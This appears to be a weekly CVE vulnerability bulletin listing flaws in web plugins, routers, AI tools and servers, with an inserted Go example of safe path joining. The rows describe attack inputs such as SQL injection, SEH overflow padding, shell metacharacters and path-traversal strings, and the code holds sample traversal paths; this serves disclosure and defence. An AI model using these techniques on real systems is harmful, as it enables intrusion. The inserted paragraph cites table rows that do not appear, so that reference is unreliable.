| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.44.0, when the server has called Server::set_trusted_proxies() with a non-empty trusted-proxy list, an attacker can send an HTTP request that includes an X-Forwarded-For header whose value parses to no valid IP segments. The code path then executes get_client_ip(), which calls front() on an empty std::vector, which is undefined behavior in C++. On typical implementations this manifests as abnormal process termination (denial of service); with sanitizers enabled, it produces an explicit runtime diagnostic. This vulnerability is fixed in 0.44.0. | 2026-05-29 | not yet calculated | CVE-2026-46527 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-hg3g-vrg8-578g |
| yoda-digital--mcp-gitlab-server | GitLab MCP Server lets an AI agent talk directly to GitLab. Prior to 0.6.0, the HTTP transport in src/transport.ts ships with no authentication layer at all and a wildcard Access-Control-Allow-Origin: * on every response. The structural defect is that the SSE server stands up a stateful, mutation-capable RPC endpoint that is backed by the operator's GITLAB_PERSONAL_ACCESS_TOKEN without any inbound credential check, then advertises itself to every cross-origin browser context via the wildcard CORS header. The httpServer.listen(port) call at line 97 also passes no host argument, so the bind defaults to 0.0.0.0 and exposes the auth-less surface on every interface. This vulnerability is fixed in 0.6.0. | 2026-05-26 | not yet calculated | CVE-2026-44895 | https://github.com/yoda-digital/mcp-gitlab-server/security/advisories/GHSA-8jr5-6gvj-rfpf |
| YVES--Sereal::Decoder | Sereal::Decoder versions before 5.005 for Perl allow heap out-of-bounds read via crafted input. In Perl/Decoder/srl_decoder.c, srl_read_object() and srl_read_hash() process a COPY tag, a back-reference whose target byte the decoder re-decodes as a fresh tag. When that target byte matches the SHORT_BINARY pattern (an inline string whose length is encoded in the low bits of the tag), the resulting read is not bounded to precede the COPY tag's own offset and can run past the end of the input buffer. An attacker controlled COPY offset can land inside a previously decoded value rather than on a tag boundary, planting a byte that the decoder reads as a SHORT_BINARY tag and consuming up to 31 following bytes from the heap as a class name (OBJECT path) or hash key (HASH path). | 2026-05-31 | not yet calculated | CVE-2026-8796 | https://github.com/Sereal/Sereal/commit/303a2c69cdba80bf37a3ff43461e0aa78198a7a3.patch https://metacpan.org/release/YVES/Sereal-Decoder-5.005/changes |
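Two path-handling rows in the table above share one root cause: the Zip Slip in the WF-500 RX Host (CVE-2025-41280) and the filepath.Join traversal in algernon (CVE-2026-43982) both join a caller-supplied path onto a base directory and use the result without checking that it still lies under that directory. The Go example below is added here as an illustration of the missing boundary check; it is not code from Waterfall, algernon, or the advisories, and the root directory, the archive entry names, and the function names are constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned for any path whose cleaned form leaves root.
var ErrOutsideRoot = errors.New("path escapes the root directory")

// UnsafeJoin is the pattern the algernon row describes: filepath.Join cleans
// the path, so "../../../tmp" under /srv/www/uploads resolves to /tmp without
// error, and nothing afterwards checks that the result is still under root.
func UnsafeJoin(root, userPath string) string {
	return filepath.Join(root, userPath)
}

// SafeJoin joins userPath onto root and rejects any result outside root.
// The boundary test uses filepath.Rel rather than a string-prefix check, so a
// sibling such as /srv/www/uploads-evil is not mistaken for a child of
// /srv/www/uploads. The check is lexical: if root may contain symlinks, resolve
// both sides with filepath.EvalSymlinks before comparing.
func SafeJoin(root, userPath string) (string, error) {
	if filepath.IsAbs(userPath) {
		return "", ErrOutsideRoot
	}
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	joined := filepath.Join(absRoot, userPath)
	rel, err := filepath.Rel(absRoot, joined)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return joined, nil
}

// FilterArchiveEntries applies SafeJoin to every member name before an archive
// is extracted, which is the check a Zip Slip extractor lacks: each member name
// is attacker-controlled and may contain "../" components or be absolute.
func FilterArchiveEntries(root string, names []string) (accepted, rejected []string) {
	for _, name := range names {
		if _, err := SafeJoin(root, name); err != nil {
			rejected = append(rejected, name)
		} else {
			accepted = append(accepted, name)
		}
	}
	return accepted, rejected
}

func main() {
	root := "/srv/www/uploads" // constructed example root
	for _, p := range []string{"2026/report.pdf", "../../../tmp", "../uploads-evil/x"} {
		safe, err := SafeJoin(root, p)
		fmt.Printf("%-18s unsafe=%-26s safe=%q err=%v\n", p, UnsafeJoin(root, p), safe, err)
	}
	// Constructed archive listing, as an extractor would see it.
	ok, bad := FilterArchiveEntries(root, []string{
		"data/2026-05.sql.gz", "../../../etc/cron.d/job", "/etc/passwd",
	})
	fmt.Println("accepted:", ok, "rejected:", bad)
}
```

The point of the filepath.Rel form is that it is the cleaned, joined result that is compared against the root, not the raw input: filtering "../" out of the input string is bypassable, whereas a result that cannot be expressed as a path beneath root is rejected regardless of how it was spelled.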
Vulnerability Summary for the Week of May 18, 2026
Posted on Tuesday May 26, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10-Strike--Network Inventory Explorer | 10-Strike Network Inventory Explorer 8.54 contains a stack-based buffer overflow vulnerability in the registration key input field that allows local attackers to execute arbitrary code by triggering a structured exception handler overwrite. Attackers can craft a malicious registration key string with 4188 bytes of padding followed by SEH chain values and shellcode, then paste it into the registration dialog to achieve code execution with application privileges. | 2026-05-23 | 8.4 | CVE-2018-25344 |
| 10-Strike--Network Scanner | 10-Strike Network Scanner 3.0 contains a local buffer overflow vulnerability in the host name field that allows attackers to bypass SafeSEH protections and execute arbitrary code. Attackers can craft a malicious payload in the host name or address field and trigger the vulnerability through the Trace route or System information functions to achieve code execution. | 2026-05-23 | 8.4 | CVE-2018-25345 |
| 10Web--Form Maker | WordPress Form Maker Plugin 1.12.24 and below contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries by injecting SQL code through the FormMakerSQLMapping and generete_csv actions. Attackers can submit POST requests with malicious SQL payloads in the name and search_labels parameters to extract, modify, or escalate privileges within the WordPress database. | 2026-05-23 | 7.1 | CVE-2018-25346 |
| acyba--AcyMailing An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress | The AcyMailing - An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 10.8.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify privileged AcyMailing configuration, export subscriber secret keys, and chain these actions into administrator account takeover when a target administrator email address is known. | 2026-05-20 | 8.8 | CVE-2026-5200 |
| Alinto--SOGo Webmail | SOGo versions 5.12.7 and prior contain a SQL injection vulnerability in the Access Control List management functionality that allows authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint. Attackers can inject malicious SQL code to write extracted data into the sogo_acl table and retrieve it through the /acls API, establishing an out-of-band data exfiltration channel. | 2026-05-18 | 8.1 | CVE-2026-8851 |
| Audiograbber--Audiograbber | Audiograbber 1.83 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious input in the Interpret or Album fields that triggers a buffer overflow, overwriting SEH pointers and executing injected shellcode with application privileges. | 2026-05-23 | 8.4 | CVE-2018-25355 |
| AWS--Amazon Braket Python SDK | Insecure deserialization in the job results processing component in Amazon Braket SDK before 1.117.0 might allow a remote authenticated user with S3 write access to the job output bucket to achieve arbitrary code execution on any machine that processes job results. We recommend you upgrade to amazon-braket-sdk version 1.117.0 or later. | 2026-05-22 | 7.1 | CVE-2026-9291 |
| AWS--Amazon Redshift connector for Python | Unsafe use of Python's eval() on server-received data in the vector_in() function in amazon-redshift-python-driver before 2.1.14 allows a rogue server or man-in-the-middle actor to execute arbitrary code on the client. To remediate this issue, users should upgrade to version 2.1.14. | 2026-05-18 | 9.8 | CVE-2026-8838 |
| AWS--Kiro CLI | Missing input source validation in the tool authorization prompt in Kiro CLI before 1.28.0 allows a local attacker to execute arbitrary tools, including shell commands, without user approval by crafting content that is piped to kiro-cli via stdin. We recommend that you upgrade to kiro-cli version 1.28.0 or later. | 2026-05-22 | 7.8 | CVE-2026-9255 |
| AWS--RabbitMQ AWS | Active debug code exists in the ARN resolver of amazon-mq rabbitmq-aws before version 0.2.1. A debug ARN scheme (arn:aws-debug:file) accepted by the PUT /api/aws/arn/validate validation endpoint might allow remote authenticated users to perform arbitrary file reads on any file accessible to the RabbitMQ process. To remediate this issue, customers should upgrade to version 0.2.1 of rabbitmq-aws. If RabbitMQ is configured to use TLS for connections, we also recommend rotating any associated private certificate keys. | 2026-05-20 | 7.7 | CVE-2026-9133 |
| baptisteArno--typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the preview chat endpoint (POST /api/v1/typebots/{typebotId}/preview/startChat) allows unauthenticated users to achieve Server-Side Request Forgery (SSRF) by supplying a custom typebot definition with server-side code blocks. The fetch function exposed inside the isolated-vm sandbox calls Node.js native fetch without the SSRF validation (validateHttpReqUrl) that protects the HTTP Request block. This bypasses all SSRF mitigations added after GHSA-8gq9-rw7v-3jpr. Exploitation of this unauthenticated SSRF vulnerability can lead to cloud credential theft, internal network access and data exfiltration for any self-hosted Typebot deployments and hosted services. This issue has been fixed in version 3.16.0. | 2026-05-22 | 10 | CVE-2026-33712 |
| baptisteArno--typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid's innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder's own origin (builder.typebot.io) under a CSP permitting 'unsafe-inline', a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder's authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0. | 2026-05-22 | 8.7 | CVE-2026-28445 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions prior to 3.16.0, SSRF protection for Webhook / HTTP Request blocks validates only the URL string, blocked hostname literals, and literal IP formats. It does not resolve DNS before allowing the request. As a result, a hostname such as ssrf-repro.example that resolves to 127.0.0.1, 169.254.169.254, or RFC1918/private space passes validation and is later fetched by the backend HTTP client. This enables server-side request forgery to loopback, cloud metadata, and private network targets. This issue has been resolved in version 3.16.0. | 2026-05-22 | 7.6 | CVE-2026-34207 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain an SSRF via Open Redirect Bypass as the HTTP Request block and Code block validate the initial request URL via validateHttpReqUrl() to block private IPs and cloud metadata hostnames. However, the HTTP clients (ky and fetch) follow 302 redirects without re-validating the redirect destination. An authenticated user can point a bot block to an attacker-controlled server that responds with a redirect to an internal IP, causing the Typebot server to reach internal services. An authenticated Typebot user can reach AWS metadata (169.254.169.254), private subnets, and container-internal services. Exploitable to extract cloud IAM credentials or probe internal APIs inaccessible from the internet. This issue has been fixed in version 3.16.0. | 2026-05-22 | 7.7 | CVE-2026-39965 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the fix for GHSA-4xc5-wfwc-jw47 ("Credential Theft via Client-Side Script Execution and API Authorization Bypass") is incomplete. While the builder's getCredentials tRPC endpoint was patched with workspace membership checks, the bot-engine runtime still allows any authenticated user to use credentials from any workspace via the preview chat endpoint. The bot-engine's getCredentials() utility function uses a falsy check (if (workspaceId && ...)) for workspace ownership validation. Since the preview endpoint accepts a client-controlled workspaceId field and the Zod schema allows empty strings, an attacker can supply workspaceId: "" to bypass credential ownership verification entirely. Exploitation can result in credential exfiltration, external service abuse, financial damage and a data breach. | 2026-05-22 | 7.1 | CVE-2026-39968 |
| Basamak Information Technology Consulting and Organization Trade Ltd. Co.--DernekWeb | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Basamak Information Technology Consulting and Organization Trade Ltd. Co. DernekWeb allows Stored XSS. This issue affects DernekWeb: through 30122025. | 2026-05-18 | 8.8 | CVE-2026-7498 |
| Behance--Smartshop | Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to category.php with UNION-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and other data. | 2026-05-23 | 8.2 | CVE-2018-25340 |
| Behance--Smartshop | Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to product.php with union-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and database names. | 2026-05-23 | 8.2 | CVE-2018-25341 |
| Behance--Smartshop | Smartshop 1 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'searched' parameter in search.php. Attackers can send GET requests with malicious SQL payloads like SLEEP commands to extract sensitive database information including product details and system data. | 2026-05-23 | 8.2 | CVE-2018-25342 |
| BerriAI--litellm | LiteLLM prior to 1.83.14 allows an authenticated internal_user to create API keys with access to routes that their role does not permit. When generating a key, the allowed_routes field is stored without verifying that the specified routes fall within the user's own permissions. A key created with access to admin-only routes can then be used to reach those routes successfully, bypassing the role-based access controls that would otherwise block the request, enabling full privilege escalation from internal_user to proxy_admin. | 2026-05-21 | 8.8 | CVE-2026-47101 |
| BerriAI--litellm | LiteLLM prior to 1.83.10 allows a user to modify their own user_role via the /user/update endpoint. While the endpoint correctly restricts users to updating only their own account, it does not restrict which fields may be changed. A user who can reach this endpoint can set their role to proxy_admin, gaining full administrative access to LiteLLM including all users, teams, keys, models, and prompt history. Users with the org_admin role have legitimate access to this endpoint and can exploit this vulnerability without chaining any additional flaw. | 2026-05-21 | 8.8 | CVE-2026-47102 |
| Besen--BS20 EV Charging Station | A weakness has been identified in Besen BS20 EV Charging Station up to 20260426. Affected by this issue is some unknown functionality of the component OTA Update Installation Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The original disclosure mentions, that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowledgement that they are reviewing this as of April 2026." | 2026-05-24 | 8.1 | CVE-2026-9397 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.0 through 5.0.9 and 6.0.0 through 6.0.2 contain an SQL injection vulnerability. An authenticated user can craft input that is incorporated into database queries without proper validation, potentially allowing them to read or modify data in the RT database. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by restricting RT account access to trusted users. | 2026-05-22 | 8.8 | CVE-2026-41075 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.9 and prior in addition to 6.0.0 through 6.0.2 contain an authentication bypass vulnerability in RT installations that use LDAP/AD for user authentication. Under certain LDAP server configurations, an attacker may be able to authenticate as any LDAP-backed RT user without supplying valid credentials. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by reviewing their LDAP server's authentication policy to ensure it rejects unauthenticated bind attempts. Upgrading RT remains the recommended fix. | 2026-05-22 | 8.1 | CVE-2026-41076 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 6.0.0 through 6.0.2 contain a Cross-Site Request Forgery (CSRF) vulnerability. An attacker who can induce a logged-in RT user to visit a malicious web page can trigger arbitrary state-changing actions in RT on that user's behalf. This issue has been fixed in version 6.0.3. | 2026-05-22 | 7.1 | CVE-2026-41074 |
| Beyaz Computer Software Design Industry and Trade Ltd. Co.--CityPLus | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Beyaz Computer Software Design Industry and Trade Ltd. Co. CityPLus allows Reflected XSS. This issue affects CityPLus: before V24.29750.1.0. | 2026-05-20 | 7.6 | CVE-2026-5783 |
| beycanpress--Account Switcher | The Account Switcher plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.2. This is due to the `rememberLogin` REST API endpoint using a loose comparison (`!=` instead of `!==`) for secret validation at `app/RestAPI.php:111`, combined with no validation that the secret is non-empty. When a target user has never used the "Remember me" feature, their `asSecret` user meta does not exist, causing `get_user_meta()` to return an empty string. An attacker can send an empty `secret` parameter, which passes the comparison (`'' != ''` is `false`), and the endpoint then calls `wp_set_auth_cookie()` for the target user. Additionally, all REST routes use `permission_callback => '__return_true'` with no capability checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to switch to any user account including Administrator, ultimately granting themselves full administrative privileges. | 2026-05-20 | 8.8 | CVE-2026-6456 |
| Cisco--Cisco Secure Workload | A vulnerability in the access validation of internal REST APIs of Cisco Secure Workload could allow an unauthenticated, remote attacker to access site resources with the privileges of the Site Admin role. This vulnerability is due to insufficient validation and authentication when accessing REST API endpoints. An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint. A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user. | 2026-05-20 | 10 | CVE-2026-20223 |
| ConnectWise--Automate | The ConnectWise Automate™ Agent does not fully verify the authenticity of components obtained during plugin loading and self-update operations. This issue is addressed in Automate 2026.5. | 2026-05-21 | 8.8 | CVE-2026-9089 |
| constantcontact--Creative Mail Easier WordPress & WooCommerce Email Marketing | The Creative Mail - Easier WordPress & WooCommerce Email Marketing plugin for WordPress is vulnerable to SQL Injection via the 'checkout_uuid' parameter in all versions up to, and including, 1.6.9. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the `has_checkout_consent()` method. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 7.5 | CVE-2026-3985 |
| contest-gallery--Contest Gallery Upload & Vote Photos, Media, Sell with PayPal & Stripe | The Contest Gallery plugin for WordPress is vulnerable to SQL Injection via the 'form_input' parameter in versions up to, and including, 28.1.6. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query inside the unauthenticated 'post_cg_gallery_form_upload' AJAX action (specifically the 'cb' branch of the included users-upload-check.php, where $f_input_id is concatenated unquoted into 'SELECT Field_Content FROM ... WHERE id = $f_input_id'). The endpoint is gated only by a public frontend nonce ('cg1l_action' / 'cg_nonce') that is exposed in the page source of any public gallery page. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-19 | 7.5 | CVE-2026-8912 |
| cssigniterteam--AudioIgniter Music Player | The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. This is due to the handle_playlist_endpoint() function (hooked to template_redirect) accepting a user-controlled playlist ID via the audioigniter_playlist_id query var or the /audioigniter/playlist/{id}/ rewrite rule and returning playlist track data without performing any authentication, capability, or post_status check - only the post_type is validated. This makes it possible for unauthenticated attackers to view track metadata (titles, artists, audio URLs, buy links, download URLs, and cover images) of any playlist on the site, including those in draft, private, pending, or trash status. | 2026-05-22 | 7.5 | CVE-2026-8679 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer (public/installer/index.php) is vulnerable to unauthenticated Remote Code Execution (RCE) because it performs the install.lock check only after including and executing form handler files, leaving installer endpoints reachable on already-installed instances. The handlers also pass unsanitized user input directly into shell commands, allowing an attacker to submit crafted requests that execute arbitrary commands on the server. The vulnerability stems from two combined weaknesses: (1) premature form handler execution before the lock file gate, and (2) unsafe use of user input in shell command construction. This issue is reported to be actively exploited in the wild. The issue has been fixed in version 1.2.0. | 2026-05-19 | 10 | CVE-2026-34234 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient's browser. The flaw exists in both App\Notifications\Ticket\Admin\AdminReplyNotification (triggered when a user replies, targeting admins) and App\Notifications\Ticket\User\ReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim's session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim's behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0. | 2026-05-19 | 8.7 | CVE-2026-34241 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH requests. Controllers missing checks on write methods store() and update() include ApplicationApiController (admin.api.write), CouponController (admin.coupons.write), PartnerController (admin.partners.write), ShopProductController (admin.store.write), UsefulLinkController (admin.useful_links.write), and VoucherController (admin.voucher.write); ProductController (admin.products.edit), ServerController (write/change_owner/change_identifier), and UserController (write/change_email/change_credits/change_username/change_password/change_role/change_referral/change_ptero/change_serverlimit) are missing checks on update() only, and ActivityLogController exposed empty stub store()/update() methods that silently accepted any request. An authenticated attacker without admin write privileges can issue API credentials, generate unlimited coupons and vouchers, assign arbitrary partner commission and discount rates, alter shop product pricing and limits, reassign server ownership or identifiers, and modify user accounts including roles, credits, passwords, and linked Pterodactyl IDs to achieve full privilege escalation, as well as abuse logBackIn() without the login_as permission to interfere with admin impersonation sessions. This issue has been fixed in version 1.2.0. | 2026-05-19 | 8.1 | CVE-2026-34358 |
| D-Link--DIR-601 | D-Link DIR601 2.02NA contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve sensitive configuration data by manipulating the table_name parameter in POST requests. Attackers can send requests to /my_cgi.cgi with table_name values like admin_user, wireless_settings, and wireless_security to extract administrative credentials and wireless network keys in clear text. | 2026-05-23 | 7.5 | CVE-2018-25358 |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager versions 4.6.2 and earlier contain an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information exposure. | 2026-05-20 | 7.5 | CVE-2025-32750 |
| Digital Operations Services Inc.--WifiBurada | Exposure of private personal information to an unauthorized actor, Insufficiently Protected Credentials vulnerability in Digital Operations Services Inc. WifiBurada allows Authentication Bypass. This issue affects WifiBurada: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-21 | 7.1 | CVE-2025-13477 |
| Divi Engine--Divi Form Builder | The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration. | 2026-05-21 | 9.8 | CVE-2026-5118 |
| Docker--Docker Desktop | The vllm-metal inference backend in Docker Model Runner on macOS unconditionally sets trust_remote_code=True when loading model tokenizers, and runs without sandboxing. This causes transformers.AutoTokenizer.from_pretrained() to import and execute arbitrary Python files included in any model pulled from an OCI registry, resulting in arbitrary code execution on the Docker host as the Docker Desktop user when inference is triggered. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model and request inference. | 2026-05-22 | 8.2 | CVE-2026-5817 |
| Docker--Docker Desktop | The MLX inference backend in Docker Model Runner on macOS uses the MLX-LM library, which unconditionally imports and executes arbitrary Python files from model directories via the model_file configuration field in config.json. When a model's config.json specifies a model_file pointing to a Python file, MLX-LM uses importlib to load and execute it with no trust_remote_code gate or equivalent safety check. The MLX backend runs without sandboxing, resulting in arbitrary code execution on the Docker host as the Docker Desktop user. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model from an attacker-controlled OCI registry and request inference. | 2026-05-22 | 8.2 | CVE-2026-5843 |
| Docker--Docker Desktop | The Docker CLI --use-api-socket flag bypasses Enhanced Container Isolation (ECI) restrictions in Docker Desktop. When ECI is enabled, Docker socket mounts from containers are denied unless explicitly allowed via the admin-settings configuration. However, the --use-api-socket flag adds the Docker socket mount via the HostConfig.Mounts field rather than the HostConfig.Binds field. The ECI enforcement in the Docker Desktop API proxy only inspected Binds, allowing the mount to pass unchecked. This grants a container full access to the Docker Engine socket and, if the host user has logged in to container registries, their authentication credentials. A local attacker with the ability to run Docker CLI commands can exploit this to escape ECI restrictions, access the Docker Engine, and potentially escalate privileges. | 2026-05-22 | 8.8 | CVE-2026-6406 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). Versions 0.26.6 and below have OS command injection through the appName parameter. Three chained issues cause this problem: inadequate input sanitization, lack of schema validation, and direct shell interpolation. User-controlled application names are passed through inadequate sanitization (the cleanAppName function only replaces spaces and converts to lowercase) before being interpolated directly into shell commands executed via execAsync() and execAsyncRemote(). An authenticated attacker can inject shell metacharacters (e.g., ;, $(), backticks, |, &) in the appName field during application creation, which are then executed with server-level privileges when service operations (start, stop, remove, scale) are triggered. This issue has been resolved in version 0.26.7. | 2026-05-18 | 9.9 | CVE-2026-27130 |
| Dolibarr--Dolibarr ERP CRM | Dolibarr ERP CRM 7.0.3 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting PHP code through the db_name parameter. Attackers can send a POST request to install/step1.php with malicious PHP code in the db_name parameter, then execute commands via the check.php endpoint using the cmd GET parameter. | 2026-05-23 | 9.8 | CVE-2018-25357 |
| Drupal--Drupal core | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection. This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10. | 2026-05-20 | 9.8 | CVE-2026-9082 |
| DumbWareio--DumbAssets | DumbAssets through 1.0.11 contains a path traversal vulnerability in the POST /api/delete-file endpoint and filesToDelete array parameters that allows unauthenticated attackers to delete arbitrary files by supplying ../ sequences that bypass directory boundary validation. Attackers can exploit the optional and disabled-by-default authentication control to traverse outside the intended application directory and delete critical files such as server.js or package.json, causing complete denial of service. | 2026-05-18 | 9.1 | CVE-2026-45230 |
| Eclipse Foundation--Eclipse Glassfish | An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish's Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user. | 2026-05-19 | 9.1 | CVE-2026-2586 |
| Eclipse Foundation--Eclipse Glassfish | A critical Remote Code Execution (RCE) vulnerability was identified in the server-side template rendering mechanism used by the Glassfish gadget handler. The application processes .xml files and evaluates user-supplied values within a context where Expression Language (EL) "expressions" are processed without proper sanitization or escaping. By injecting expressions such as #{7*7}, the server returns 49, confirming server-side EL evaluation. This issue allows a remote attacker to fully compromise the underlying host, enabling capabilities as reading/modifying data, executing arbitrary commands, persistence, and lateral movement. | 2026-05-19 | 9.6 | CVE-2026-2587 |
| Edimax--BR-6428NS | A flaw has been found in Edimax BR-6428NS 1.10. This affects the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. This manipulation of the argument L2TPUserName causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 8.8 | CVE-2026-8775 |
| Edimax--BR-6428NS | A vulnerability has been found in Edimax BR-6428NS 1.10. This vulnerability affects the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Such manipulation of the argument pptpUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 8.8 | CVE-2026-8776 |
| Edimax--BR-6428NS | A vulnerability was identified in Edimax BR-6428NS 1.10. The impacted element is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. Such manipulation of the argument pppUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 8.8 | CVE-2026-9294 |
| Edimax--BR-6428NS | A security flaw has been discovered in Edimax BR-6428NS 1.10. This affects the function formWirelessTbl of the file /goform/formWirelessTbl of the component POST Request Handler. Performing a manipulation of the argument vapurl results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 8.8 | CVE-2026-9295 |
| Edimax--BR-6675nD | A security vulnerability has been detected in Edimax BR-6675nD 1.12. Affected is the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. Such manipulation of the argument L2TPUserName leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9380 |
| Edimax--BR-6675nD | A vulnerability was detected in Edimax BR-6675nD 1.12. Affected by this vulnerability is the function formPPPoESetup of the file /goform/formPPPoESetup of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9381 |
| Edimax--BR-6675nD | A flaw has been found in Edimax BR-6675nD 1.12. Affected by this issue is the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Executing a manipulation of the argument pptpUserName can lead to buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9382 |
